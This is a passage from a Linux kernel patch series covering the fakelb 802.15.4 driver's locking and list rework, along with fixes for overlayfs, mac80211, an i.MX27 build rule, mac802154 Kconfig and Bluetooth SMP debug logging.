@@ static const struct ieee802154_ops fakelb_ops = { module_param(numlbs, int, 0); MODULE_PARM_DESC(numlbs, " number of pseudo devices"); -static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) +static int fakelb_add_one(struct device *dev) { struct fakelb_phy *phy; int err; @@ -176,9 +172,6 @@ static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) /* 950 MHz GFSK 802.15.4d-2009 */ hw->phy->supported.channels[6] |= 0x3ffc00; - INIT_LIST_HEAD(&phy->list); - phy->fake = fake; - spin_lock_init(&phy->lock); hw->parent = dev; @@ -188,7 +181,7 @@ static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) goto err_reg; write_lock_bh(&fakelb_lock); - list_add_tail(&phy->list, &fake->list); + list_add_tail(&phy->list, &fakelb_phys); write_unlock_bh(&fakelb_lock); return 0; @@ -210,41 +203,30 @@ static void fakelb_del(struct fakelb_phy *phy) static int fakelb_probe(struct platform_device *pdev) { - struct fakelb_priv *priv; struct fakelb_phy *phy, *tmp; int err = -ENOMEM; int i; - priv = devm_kzalloc(&pdev->dev, sizeof(struct fakelb_priv), - GFP_KERNEL); - if (!priv) - goto err_alloc; - - INIT_LIST_HEAD(&priv->list); - for (i = 0; i < numlbs; i++) { - err = fakelb_add_one(&pdev->dev, priv); + err = fakelb_add_one(&pdev->dev); if (err < 0) goto err_slave; } - platform_set_drvdata(pdev, priv); dev_info(&pdev->dev, "added ieee802154 hardware\n"); return 0; err_slave: - list_for_each_entry_safe(phy, tmp, &priv->list, list) + list_for_each_entry_safe(phy, tmp, &fakelb_phys, list) fakelb_del(phy); -err_alloc: return err; } static int fakelb_remove(struct platform_device *pdev) { - struct fakelb_priv *priv = platform_get_drvdata(pdev); struct fakelb_phy *phy, *temp; - list_for_each_entry_safe(phy, temp, &priv->list, list) + list_for_each_entry_safe(phy, temp, &fakelb_phys, list) fakelb_del(phy); return 0; From 6fa2cffe8cf937fc10be362a2dcac8a5965f618e Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:04 +0200 Subject: [PATCH 105/872] fakelb: move lock out of iteration The list need to be protected while iteration which is need when other list iterates at the same time over this list. 
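In other words, the read/write lock has to be held around the whole list walk, not just inside the helper that unlinks a single entry, so that a concurrent reader never sees a half-torn-down list. A rough sketch of that shape (illustrative only; all names are made up):

#include <linux/list.h>
#include <linux/spinlock.h>

struct node {
	struct list_head list;
};

static LIST_HEAD(example_list);
static DEFINE_RWLOCK(example_lock);

/* Hypothetical reader: several of these may walk the list concurrently. */
static int example_count(void)
{
	struct node *n;
	int count = 0;

	read_lock_bh(&example_lock);
	list_for_each_entry(n, &example_list, list)
		count++;
	read_unlock_bh(&example_lock);

	return count;
}

/* Hypothetical writer: the lock covers the complete removal loop. */
static void example_remove_all(void)
{
	struct node *n, *tmp;

	write_lock_bh(&example_lock);
	list_for_each_entry_safe(n, tmp, &example_list, list)
		list_del(&n->list);
	write_unlock_bh(&example_lock);
}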
Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index c7e7d506224f..e1c0195c18aa 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -193,9 +193,7 @@ static int fakelb_add_one(struct device *dev) static void fakelb_del(struct fakelb_phy *phy) { - write_lock_bh(&fakelb_lock); list_del(&phy->list); - write_unlock_bh(&fakelb_lock); ieee802154_unregister_hw(phy->hw); ieee802154_free_hw(phy->hw); @@ -217,8 +215,10 @@ static int fakelb_probe(struct platform_device *pdev) return 0; err_slave: + write_lock_bh(&fakelb_lock); list_for_each_entry_safe(phy, tmp, &fakelb_phys, list) fakelb_del(phy); + write_unlock_bh(&fakelb_lock); return err; } @@ -226,9 +226,10 @@ static int fakelb_remove(struct platform_device *pdev) { struct fakelb_phy *phy, *temp; + write_lock_bh(&fakelb_lock); list_for_each_entry_safe(phy, temp, &fakelb_phys, list) fakelb_del(phy); - + write_unlock_bh(&fakelb_lock); return 0; } From e369dc8f1aa95cd490e1ab75043dcf50d2190453 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:05 +0200 Subject: [PATCH 106/872] fakelb: introduce fakelb ifup phys list This patch introduce a fakelb ifup phys list, which stores all registered phys which are in an operated mode. This will reduce the iterations of non-operated phys while transmit frames. There exists two locks now, one rwlock for the operated interfaces and the spinlock for protecting the list for all registered virtual phys. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 58 ++++++++++++++------------------- 1 file changed, 25 insertions(+), 33 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index e1c0195c18aa..83957de47243 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -28,16 +28,18 @@ #include static int numlbs = 2; -static DEFINE_RWLOCK(fakelb_lock); + static LIST_HEAD(fakelb_phys); +static DEFINE_SPINLOCK(fakelb_phys_lock); + +static LIST_HEAD(fakelb_ifup_phys); +static DEFINE_RWLOCK(fakelb_ifup_phys_lock); struct fakelb_phy { struct ieee802154_hw *hw; struct list_head list; - - spinlock_t lock; - bool working; + struct list_head list_ifup; }; static int @@ -62,13 +64,9 @@ fakelb_hw_deliver(struct fakelb_phy *phy, struct sk_buff *skb) { struct sk_buff *newskb; - spin_lock(&phy->lock); - if (phy->working) { - newskb = pskb_copy(skb, GFP_ATOMIC); - if (newskb) - ieee802154_rx_irqsafe(phy->hw, newskb, 0xcc); - } - spin_unlock(&phy->lock); + newskb = pskb_copy(skb, GFP_ATOMIC); + if (newskb) + ieee802154_rx_irqsafe(phy->hw, newskb, 0xcc); } static int @@ -77,8 +75,8 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) struct fakelb_phy *current_phy = hw->priv; struct fakelb_phy *phy; - read_lock_bh(&fakelb_lock); - list_for_each_entry(phy, &fakelb_phys, list) { + read_lock_bh(&fakelb_ifup_phys_lock); + list_for_each_entry(phy, &fakelb_ifup_phys, list_ifup) { if (current_phy == phy) continue; @@ -86,7 +84,7 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) current_phy->hw->phy->current_channel) fakelb_hw_deliver(phy, skb); } - read_unlock_bh(&fakelb_lock); + read_unlock_bh(&fakelb_ifup_phys_lock); return 0; } @@ -94,25 +92,21 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) static int fakelb_hw_start(struct ieee802154_hw 
*hw) { struct fakelb_phy *phy = hw->priv; - int ret = 0; - spin_lock(&phy->lock); - if (phy->working) - ret = -EBUSY; - else - phy->working = 1; - spin_unlock(&phy->lock); + write_lock_bh(&fakelb_ifup_phys_lock); + list_add(&phy->list_ifup, &fakelb_ifup_phys); + write_unlock_bh(&fakelb_ifup_phys_lock); - return ret; + return 0; } static void fakelb_hw_stop(struct ieee802154_hw *hw) { struct fakelb_phy *phy = hw->priv; - spin_lock(&phy->lock); - phy->working = 0; - spin_unlock(&phy->lock); + write_lock_bh(&fakelb_ifup_phys_lock); + list_del(&phy->list_ifup); + write_unlock_bh(&fakelb_ifup_phys_lock); } static const struct ieee802154_ops fakelb_ops = { @@ -172,17 +166,15 @@ static int fakelb_add_one(struct device *dev) /* 950 MHz GFSK 802.15.4d-2009 */ hw->phy->supported.channels[6] |= 0x3ffc00; - spin_lock_init(&phy->lock); - hw->parent = dev; err = ieee802154_register_hw(hw); if (err) goto err_reg; - write_lock_bh(&fakelb_lock); + spin_lock(&fakelb_phys_lock); list_add_tail(&phy->list, &fakelb_phys); - write_unlock_bh(&fakelb_lock); + spin_unlock(&fakelb_phys_lock); return 0; @@ -215,10 +207,10 @@ static int fakelb_probe(struct platform_device *pdev) return 0; err_slave: - write_lock_bh(&fakelb_lock); + spin_lock(&fakelb_phys_lock); list_for_each_entry_safe(phy, tmp, &fakelb_phys, list) fakelb_del(phy); - write_unlock_bh(&fakelb_lock); + spin_unlock(&fakelb_phys_lock); return err; } @@ -226,10 +218,10 @@ static int fakelb_remove(struct platform_device *pdev) { struct fakelb_phy *phy, *temp; - write_lock_bh(&fakelb_lock); + spin_lock(&fakelb_phys_lock); list_for_each_entry_safe(phy, temp, &fakelb_phys, list) fakelb_del(phy); - write_unlock_bh(&fakelb_lock); + spin_unlock(&fakelb_phys_lock); return 0; } From 12da8d97ab3239101077a415c2587bfbf6725216 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:06 +0200 Subject: [PATCH 107/872] fakelb: use own channel and page attributes This patch adds an own phy attribute for page and channel into fakelb_phy. The current way is to use the internal mac802154 stored phy pib values which can occur in locking issues while using it inside the driver layer. 
Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 83957de47243..c60837e0df25 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -38,6 +38,9 @@ static DEFINE_RWLOCK(fakelb_ifup_phys_lock); struct fakelb_phy { struct ieee802154_hw *hw; + u8 page; + u8 channel; + struct list_head list; struct list_head list_ifup; }; @@ -54,8 +57,12 @@ fakelb_hw_ed(struct ieee802154_hw *hw, u8 *level) static int fakelb_hw_channel(struct ieee802154_hw *hw, u8 page, u8 channel) { - pr_debug("set channel to %d\n", channel); + struct fakelb_phy *phy = hw->priv; + write_lock_bh(&fakelb_ifup_phys_lock); + phy->page = page; + phy->channel = channel; + write_unlock_bh(&fakelb_ifup_phys_lock); return 0; } @@ -80,8 +87,8 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) if (current_phy == phy) continue; - if (phy->hw->phy->current_channel == - current_phy->hw->phy->current_channel) + if (current_phy->page == phy->page && + current_phy->channel == phy->channel) fakelb_hw_deliver(phy, skb); } read_unlock_bh(&fakelb_ifup_phys_lock); From e214a9040a602552d40d0c71cdb38fac8f619cd6 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:07 +0200 Subject: [PATCH 108/872] fakelb: add virtual phy reset defaults This patch adds reset defaults for the fakelb phy. Channel 13 and page 0 are used, which matches the defaults of the at86rf233. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index c60837e0df25..d693a539f8f3 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -173,6 +173,11 @@ static int fakelb_add_one(struct device *dev) /* 950 MHz GFSK 802.15.4d-2009 */ hw->phy->supported.channels[6] |= 0x3ffc00; + ieee802154_random_extended_addr(&hw->phy->perm_extended_addr); + /* fake phy channel 13 as default */ + hw->phy->current_channel = 13; + phy->channel = hw->phy->current_channel; + hw->parent = dev; err = ieee802154_register_hw(hw); From 98be165b4355f750a62ca5ad280e04a135fe9bbd Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:08 +0200 Subject: [PATCH 109/872] fakelb: remove fakelb_hw_deliver This patch cleans up by removing the fakelb_hw_deliver function and folding its body into the only caller. 
Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 18 ++++++------------ 1 file changed, 6 insertions(+), 12 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index d693a539f8f3..10e2d27dbed4 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -66,16 +66,6 @@ fakelb_hw_channel(struct ieee802154_hw *hw, u8 page, u8 channel) return 0; } -static void -fakelb_hw_deliver(struct fakelb_phy *phy, struct sk_buff *skb) -{ - struct sk_buff *newskb; - - newskb = pskb_copy(skb, GFP_ATOMIC); - if (newskb) - ieee802154_rx_irqsafe(phy->hw, newskb, 0xcc); -} - static int fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) { @@ -88,8 +78,12 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) continue; if (current_phy->page == phy->page && - current_phy->channel == phy->channel) - fakelb_hw_deliver(phy, skb); + current_phy->channel == phy->channel) { + struct sk_buff *newskb = pskb_copy(skb, GFP_ATOMIC); + + if (newskb) + ieee802154_rx_irqsafe(phy->hw, newskb, 0xcc); + } } read_unlock_bh(&fakelb_ifup_phys_lock); From a09c07a8c89ee910f97d09577ec30b3084fb1d6a Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:09 +0200 Subject: [PATCH 110/872] fakelb: add support for async xmit handling This patch will add async xmit support for the fakelb driver. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 10e2d27dbed4..8f37ea0fa1f5 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -87,6 +87,7 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) } read_unlock_bh(&fakelb_ifup_phys_lock); + ieee802154_xmit_complete(hw, skb, false); return 0; } @@ -112,7 +113,7 @@ fakelb_hw_stop(struct ieee802154_hw *hw) { static const struct ieee802154_ops fakelb_ops = { .owner = THIS_MODULE, - .xmit_sync = fakelb_hw_xmit, + .xmit_async = fakelb_hw_xmit, .ed = fakelb_hw_ed, .set_channel = fakelb_hw_channel, .start = fakelb_hw_start, From 39572ab30feb92a8d49bf2a59c9a492ba858c008 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:10 +0200 Subject: [PATCH 111/872] fakelb: cleanup code This patch just cleanups the code at several places. 
Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 29 ++++++++++++----------------- 1 file changed, 12 insertions(+), 17 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 8f37ea0fa1f5..9d0da4ec3e8c 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -45,8 +45,7 @@ struct fakelb_phy { struct list_head list_ifup; }; -static int -fakelb_hw_ed(struct ieee802154_hw *hw, u8 *level) +static int fakelb_hw_ed(struct ieee802154_hw *hw, u8 *level) { BUG_ON(!level); *level = 0xbe; @@ -54,8 +53,7 @@ fakelb_hw_ed(struct ieee802154_hw *hw, u8 *level) return 0; } -static int -fakelb_hw_channel(struct ieee802154_hw *hw, u8 page, u8 channel) +static int fakelb_hw_channel(struct ieee802154_hw *hw, u8 page, u8 channel) { struct fakelb_phy *phy = hw->priv; @@ -66,11 +64,9 @@ fakelb_hw_channel(struct ieee802154_hw *hw, u8 page, u8 channel) return 0; } -static int -fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) +static int fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) { - struct fakelb_phy *current_phy = hw->priv; - struct fakelb_phy *phy; + struct fakelb_phy *current_phy = hw->priv, *phy; read_lock_bh(&fakelb_ifup_phys_lock); list_for_each_entry(phy, &fakelb_ifup_phys, list_ifup) { @@ -91,8 +87,8 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) return 0; } -static int -fakelb_hw_start(struct ieee802154_hw *hw) { +static int fakelb_hw_start(struct ieee802154_hw *hw) +{ struct fakelb_phy *phy = hw->priv; write_lock_bh(&fakelb_ifup_phys_lock); @@ -102,8 +98,8 @@ fakelb_hw_start(struct ieee802154_hw *hw) { return 0; } -static void -fakelb_hw_stop(struct ieee802154_hw *hw) { +static void fakelb_hw_stop(struct ieee802154_hw *hw) +{ struct fakelb_phy *phy = hw->priv; write_lock_bh(&fakelb_ifup_phys_lock); @@ -126,9 +122,9 @@ MODULE_PARM_DESC(numlbs, " number of pseudo devices"); static int fakelb_add_one(struct device *dev) { + struct ieee802154_hw *hw; struct fakelb_phy *phy; int err; - struct ieee802154_hw *hw; hw = ieee802154_alloc_hw(sizeof(*phy), &fakelb_ops); if (!hw) @@ -201,8 +197,7 @@ static void fakelb_del(struct fakelb_phy *phy) static int fakelb_probe(struct platform_device *pdev) { struct fakelb_phy *phy, *tmp; - int err = -ENOMEM; - int i; + int err, i; for (i = 0; i < numlbs; i++) { err = fakelb_add_one(&pdev->dev); @@ -223,10 +218,10 @@ static int fakelb_probe(struct platform_device *pdev) static int fakelb_remove(struct platform_device *pdev) { - struct fakelb_phy *phy, *temp; + struct fakelb_phy *phy, *tmp; spin_lock(&fakelb_phys_lock); - list_for_each_entry_safe(phy, temp, &fakelb_phys, list) + list_for_each_entry_safe(phy, tmp, &fakelb_phys, list) fakelb_del(phy); spin_unlock(&fakelb_phys_lock); return 0; From cc6f67bcafcb6bbbb2d1be1603dcd95125a52800 Mon Sep 17 00:00:00 2001 From: Miklos Szeredi Date: Tue, 19 May 2015 14:30:12 +0200 Subject: [PATCH 112/872] ovl: mount read-only if workdir can't be created OpenWRT folks reported that overlayfs fails to mount if upper fs is full, because workdir can't be created. Wordir creation can fail for various other reasons too. There's no reason that the mount itself should fail, overlayfs can work fine without a workdir, as long as the overlay isn't modified. So mount it read-only and don't allow remounting read-write. Add a couple of WARN_ON()s for the impossible case of workdir being used despite being read-only. 
Reported-by: Bastian Bittorf Signed-off-by: Miklos Szeredi Cc: # v3.18+ --- fs/overlayfs/copy_up.c | 3 +++ fs/overlayfs/dir.c | 9 +++++++++ fs/overlayfs/super.c | 10 +++++----- 3 files changed, 17 insertions(+), 5 deletions(-) diff --git a/fs/overlayfs/copy_up.c b/fs/overlayfs/copy_up.c index 24f640441bd9..84d693d37428 100644 --- a/fs/overlayfs/copy_up.c +++ b/fs/overlayfs/copy_up.c @@ -299,6 +299,9 @@ int ovl_copy_up_one(struct dentry *parent, struct dentry *dentry, struct cred *override_cred; char *link = NULL; + if (WARN_ON(!workdir)) + return -EROFS; + ovl_path_upper(parent, &parentpath); upperdir = parentpath.dentry; diff --git a/fs/overlayfs/dir.c b/fs/overlayfs/dir.c index 2578a0c0677d..692ceda3bc21 100644 --- a/fs/overlayfs/dir.c +++ b/fs/overlayfs/dir.c @@ -222,6 +222,9 @@ static struct dentry *ovl_clear_empty(struct dentry *dentry, struct kstat stat; int err; + if (WARN_ON(!workdir)) + return ERR_PTR(-EROFS); + err = ovl_lock_rename_workdir(workdir, upperdir); if (err) goto out; @@ -322,6 +325,9 @@ static int ovl_create_over_whiteout(struct dentry *dentry, struct inode *inode, struct dentry *newdentry; int err; + if (WARN_ON(!workdir)) + return -EROFS; + err = ovl_lock_rename_workdir(workdir, upperdir); if (err) goto out; @@ -506,6 +512,9 @@ static int ovl_remove_and_whiteout(struct dentry *dentry, bool is_dir) struct dentry *opaquedir = NULL; int err; + if (WARN_ON(!workdir)) + return -EROFS; + if (is_dir) { if (OVL_TYPE_MERGE_OR_LOWER(ovl_path_type(dentry))) { opaquedir = ovl_check_empty_and_clear(dentry); diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c index 5f0d1993e6e3..bf8537c7f455 100644 --- a/fs/overlayfs/super.c +++ b/fs/overlayfs/super.c @@ -529,7 +529,7 @@ static int ovl_remount(struct super_block *sb, int *flags, char *data) { struct ovl_fs *ufs = sb->s_fs_info; - if (!(*flags & MS_RDONLY) && !ufs->upper_mnt) + if (!(*flags & MS_RDONLY) && (!ufs->upper_mnt || !ufs->workdir)) return -EROFS; return 0; @@ -925,9 +925,10 @@ static int ovl_fill_super(struct super_block *sb, void *data, int silent) ufs->workdir = ovl_workdir_create(ufs->upper_mnt, workpath.dentry); err = PTR_ERR(ufs->workdir); if (IS_ERR(ufs->workdir)) { - pr_err("overlayfs: failed to create directory %s/%s\n", - ufs->config.workdir, OVL_WORKDIR_NAME); - goto out_put_upper_mnt; + pr_warn("overlayfs: failed to create directory %s/%s (errno: %i); mounting read-only\n", + ufs->config.workdir, OVL_WORKDIR_NAME, -err); + sb->s_flags |= MS_RDONLY; + ufs->workdir = NULL; } } @@ -997,7 +998,6 @@ static int ovl_fill_super(struct super_block *sb, void *data, int silent) kfree(ufs->lower_mnt); out_put_workdir: dput(ufs->workdir); -out_put_upper_mnt: mntput(ufs->upper_mnt); out_put_lowerpath: for (i = 0; i < numlower; i++) From 22d3a3c829fa9ecdb493d1f1f2838d543f8d86a3 Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Tue, 19 May 2015 15:40:21 +0200 Subject: [PATCH 113/872] mac80211: don't use napi_gro_receive() outside NAPI context No matter how the driver manages its NAPI context, there's no way sending frames to it from a timer can be correct, since it would corrupt the internal GRO lists. To avoid that, always use the non-NAPI path when releasing frames from the timer. 
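As background (an editorial sketch, not part of the patch): napi_gro_receive() is only safe from the driver's NAPI poll callback, where the per-NAPI GRO lists are later flushed around napi_complete(); any other context, such as a timer, has to fall back to netif_receive_skb(). A minimal illustration with hypothetical foo_* names:

#include <linux/kernel.h>
#include <linux/netdevice.h>
#include <linux/skbuff.h>

struct foo_rx {
	struct napi_struct napi;
	struct sk_buff_head queue;
};

/* NAPI poll callback: GRO is allowed because we run in NAPI context. */
static int foo_poll(struct napi_struct *napi, int budget)
{
	struct foo_rx *rx = container_of(napi, struct foo_rx, napi);
	struct sk_buff *skb;
	int done = 0;

	while (done < budget && (skb = skb_dequeue(&rx->queue))) {
		napi_gro_receive(napi, skb);
		done++;
	}
	if (done < budget)
		napi_complete(napi);
	return done;
}

/* Timer or tasklet context: bypass GRO entirely. */
static void foo_deliver_no_napi(struct sk_buff *skb)
{
	netif_receive_skb(skb);
}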
Cc: stable@vger.kernel.org Reported-by: Jean Trivelly Signed-off-by: Johannes Berg --- net/mac80211/ieee80211_i.h | 3 +++ net/mac80211/rx.c | 5 +++-- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h index ab46ab4a7249..cdc374296245 100644 --- a/net/mac80211/ieee80211_i.h +++ b/net/mac80211/ieee80211_i.h @@ -205,6 +205,8 @@ enum ieee80211_packet_rx_flags { * @IEEE80211_RX_CMNTR: received on cooked monitor already * @IEEE80211_RX_BEACON_REPORTED: This frame was already reported * to cfg80211_report_obss_beacon(). + * @IEEE80211_RX_REORDER_TIMER: this frame is released by the + * reorder buffer timeout timer, not the normal RX path * * These flags are used across handling multiple interfaces * for a single frame. @@ -212,6 +214,7 @@ enum ieee80211_packet_rx_flags { enum ieee80211_rx_flags { IEEE80211_RX_CMNTR = BIT(0), IEEE80211_RX_BEACON_REPORTED = BIT(1), + IEEE80211_RX_REORDER_TIMER = BIT(2), }; struct ieee80211_rx_data { diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c index 260eed45b6d2..5793f75c5ffd 100644 --- a/net/mac80211/rx.c +++ b/net/mac80211/rx.c @@ -2121,7 +2121,8 @@ ieee80211_deliver_skb(struct ieee80211_rx_data *rx) /* deliver to local stack */ skb->protocol = eth_type_trans(skb, dev); memset(skb->cb, 0, sizeof(skb->cb)); - if (rx->local->napi) + if (!(rx->flags & IEEE80211_RX_REORDER_TIMER) && + rx->local->napi) napi_gro_receive(rx->local->napi, skb); else netif_receive_skb(skb); @@ -3231,7 +3232,7 @@ void ieee80211_release_reorder_timeout(struct sta_info *sta, int tid) /* This is OK -- must be QoS data frame */ .security_idx = tid, .seqno_idx = tid, - .flags = 0, + .flags = IEEE80211_RX_REORDER_TIMER, }; struct tid_ampdu_rx *tid_agg_rx; From e46b5a6470a5e2c8e1096f8f60887ac19949055b Mon Sep 17 00:00:00 2001 From: Shawn Guo Date: Tue, 19 May 2015 22:06:41 +0800 Subject: [PATCH 114/872] ARM: dts: fix imx27 dtb build rule The i.MX27 dtb build should be controlled by CONFIG_SOC_IMX27 rather than CONFIG_SOC_IMX31. Signed-off-by: Shawn Guo Fixes: cb612390e546 ("ARM: dts: Only build dtb if associated Arch and/or SoC is enabled") Cc: --- arch/arm/boot/dts/Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/arm/boot/dts/Makefile b/arch/arm/boot/dts/Makefile index 86217db2937a..992736b5229b 100644 --- a/arch/arm/boot/dts/Makefile +++ b/arch/arm/boot/dts/Makefile @@ -223,7 +223,7 @@ dtb-$(CONFIG_SOC_IMX25) += \ imx25-eukrea-mbimxsd25-baseboard-dvi-vga.dtb \ imx25-karo-tx25.dtb \ imx25-pdk.dtb -dtb-$(CONFIG_SOC_IMX31) += \ +dtb-$(CONFIG_SOC_IMX27) += \ imx27-apf27.dtb \ imx27-apf27dev.dtb \ imx27-eukrea-mbimxsd27-baseboard.dtb \ From 73e85ed36a96324a2ba5990024f621bf9907fbd5 Mon Sep 17 00:00:00 2001 From: Arnd Bergmann Date: Tue, 19 May 2015 14:18:35 +0200 Subject: [PATCH 115/872] mac802154: select CRYPTO when needed The mac802154 subsystem uses functions from the crypto layer and correctly selects the individual crypto algorithms, but fails to build when the crypto layer is disabled altogether: crypto/built-in.o: In function `crypto_ctr_free': :(.text+0x80): undefined reference to `crypto_drop_spawn' crypto/built-in.o: In function `crypto_rfc3686_free': :(.text+0xac): undefined reference to `crypto_drop_spawn' crypto/built-in.o: In function `crypto_ctr_crypt': :(.text+0x2f0): undefined reference to `blkcipher_walk_virt_block' :(.text+0x2f8): undefined reference to `crypto_inc' To solve that, this patch also selects the core crypto code, like all other users of that code do. 
Signed-off-by: Arnd Bergmann Reviewed-by: Stefan Schmidt Signed-off-by: Marcel Holtmann --- net/mac802154/Kconfig | 1 + 1 file changed, 1 insertion(+) diff --git a/net/mac802154/Kconfig b/net/mac802154/Kconfig index aa462b480a39..fb45287ebac3 100644 --- a/net/mac802154/Kconfig +++ b/net/mac802154/Kconfig @@ -2,6 +2,7 @@ config MAC802154 tristate "Generic IEEE 802.15.4 Soft Networking Stack (mac802154)" depends on IEEE802154 select CRC_CCITT + select CRYPTO select CRYPTO_AUTHENC select CRYPTO_CCM select CRYPTO_CTR From 011c391a090e243ef0116805a6ad77df74c22cc0 Mon Sep 17 00:00:00 2001 From: Johan Hedberg Date: Tue, 19 May 2015 21:06:04 +0300 Subject: [PATCH 116/872] Bluetooth: Add debug logs for legacy SMP crypto functions To help debug legacy SMP crypto functions add debug logs of the various values involved. Signed-off-by: Johan Hedberg Signed-off-by: Marcel Holtmann --- net/bluetooth/smp.c | 20 ++++++++++++++++---- 1 file changed, 16 insertions(+), 4 deletions(-) diff --git a/net/bluetooth/smp.c b/net/bluetooth/smp.c index 1ab3dc9c8f99..659371af39e4 100644 --- a/net/bluetooth/smp.c +++ b/net/bluetooth/smp.c @@ -371,6 +371,8 @@ static int smp_e(struct crypto_blkcipher *tfm, const u8 *k, u8 *r) uint8_t tmp[16], data[16]; int err; + SMP_DBG("k %16phN r %16phN", k, r); + if (!tfm) { BT_ERR("tfm %p", tfm); return -EINVAL; @@ -400,6 +402,8 @@ static int smp_e(struct crypto_blkcipher *tfm, const u8 *k, u8 *r) /* Most significant octet of encryptedData corresponds to data[0] */ swap_buf(data, r, 16); + SMP_DBG("r %16phN", r); + return err; } @@ -410,6 +414,10 @@ static int smp_c1(struct crypto_blkcipher *tfm_aes, const u8 k[16], u8 p1[16], p2[16]; int err; + SMP_DBG("k %16phN r %16phN", k, r); + SMP_DBG("iat %u ia %6phN rat %u ra %6phN", _iat, ia, _rat, ra); + SMP_DBG("preq %7phN pres %7phN", preq, pres); + memset(p1, 0, 16); /* p1 = pres || preq || _rat || _iat */ @@ -418,10 +426,7 @@ static int smp_c1(struct crypto_blkcipher *tfm_aes, const u8 k[16], memcpy(p1 + 2, preq, 7); memcpy(p1 + 9, pres, 7); - /* p2 = padding || ia || ra */ - memcpy(p2, ra, 6); - memcpy(p2 + 6, ia, 6); - memset(p2 + 12, 0, 4); + SMP_DBG("p1 %16phN", p1); /* res = r XOR p1 */ u128_xor((u128 *) res, (u128 *) r, (u128 *) p1); @@ -433,6 +438,13 @@ static int smp_c1(struct crypto_blkcipher *tfm_aes, const u8 k[16], return err; } + /* p2 = padding || ia || ra */ + memcpy(p2, ra, 6); + memcpy(p2 + 6, ia, 6); + memset(p2 + 12, 0, 4); + + SMP_DBG("p2 %16phN", p2); + /* res = res XOR p2 */ u128_xor((u128 *) res, (u128 *) res, (u128 *) p2); From ee7619f2eb21304dcc846b8dc8f8c3d6cbe11792 Mon Sep 17 00:00:00 2001 From: Nicholas Bellinger Date: Tue, 19 May 2015 15:10:44 -0700 Subject: [PATCH 117/872] target: Drop signal_pending checks after interruptible lock acquire Once upon a time, iscsit_get_tpg() was using an un-interruptible lock. The signal_pending() usage was a check to allow userspace to break out of the operation with SIGINT. AFAICT, there's no reason why this is necessary anymore, and as reported by Alexey can be potentially dangerous. Also, go ahead and drop the other two problematic cases within iscsit_access_np() and sbc_compare_and_write() as well. Found by Linux Driver Verification project (linuxtesting.org). 
